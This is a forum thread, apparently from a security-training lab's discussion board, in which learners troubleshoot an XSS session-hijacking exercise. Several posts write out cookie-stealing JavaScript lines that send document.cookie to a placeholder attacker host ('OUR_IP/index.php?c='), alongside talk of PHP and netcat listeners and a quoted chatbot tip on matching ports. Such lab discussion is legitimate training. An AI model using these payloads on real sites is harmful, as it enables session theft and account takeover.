Cross Site Scripting - Session Hijacking

Hello all, please again I am coming to you for help I am currently trying to get my PHP server to give my script the file it needs to find the cookie I need I know that might have been a little confusing dm me if you don’t get my question.

Hi bro.

Can you explain again what is the issue? With more details and what you do for solve it, pls. To know what and why you’re stuck.

I finally got the flag but I am stuck again LOL!!! I am stuck on the skills assessment. Please help!

Ok I dont know what I’m doing wrong. I got the php server set up. I sent my pay load:


I put it in the Full Name, User Name, and Image from individually and separate and I keep getting blocked. I get activity on the server. I’m just not getting the cookie.

I’ve been hitting my head against this for a couple of days.

Have the php server running and I’m getting the first link back to my web server (http://myIP/script.js)
But that script isn’t opening my index.php file

I’ve tried having document.location=‘http://OUR_IP/index.php?c=’+document.cookie;
and the new Image().src=‘http://OUR_IP/index.php?c=’+document.cookie;

and without the script tags with no luck either way.

Is the trick to get this to work some silly quote issue or how can I see why the 2nd call to index.php not going out?

Nevermind . The magic was posting here.

Didn’t use “script.js” as a filename + making sure OUR_IP was actually changed. Maybe some other stuff but eventually got the index.php to be called.

i said that i cant find the right payload
already tried all those listed ones…
i sent whit my tun address but they dont request my php or nc server neither.


1 Like

I’m getting the same as @paulorcsjr . I’ve very carefully done every single step according to the steps laid out in the write up. I think the backend of HTB is broken. Is there a way to work around the broken infrastructure? The scripts written for this exercise on the backend are failing and won’t let anyone properly finish this section.


Hey guys! need some help too, please!
I was able to found the correct payload and got the following result:

no idea why it didn’t connect to the index.php page after to get the cookie.

ps: not sure why is apearing this “(null)” after '/script.js" on the server log, the code in the file is the:

new Image().src='http://OUR_IP/index.php?c='+document.cookie

And i changed for the VM ip

found it.

i finally got it… finding the payload took so much time from me even though it turned out that it is one of the six payloads mentioned in the module (the third one ) hope this help and I think we need to learn more about black boxing pt​:smiling_face_with_tear::+1:

give me payload plaese I stuck 3 day

It seems that my issue was similar to yours. I asked ChatGPT for advice and received multiple answers, but the one that allowed me to successfully obtain the cookie was the last answer: “Additionally, make sure to check the port you set on your listening server. In your description, you mentioned using port 520 (sudo php -S ), but in the XSS payload, you did not specify the port ("><script src=""></script> ). Please ensure that you add the correct port in the XSS payload, as shown below: "><script src=""></script> . Therefore, please make sure that the listening port and the port in the script tag are consistent.”

1 Like

You manage to solve this?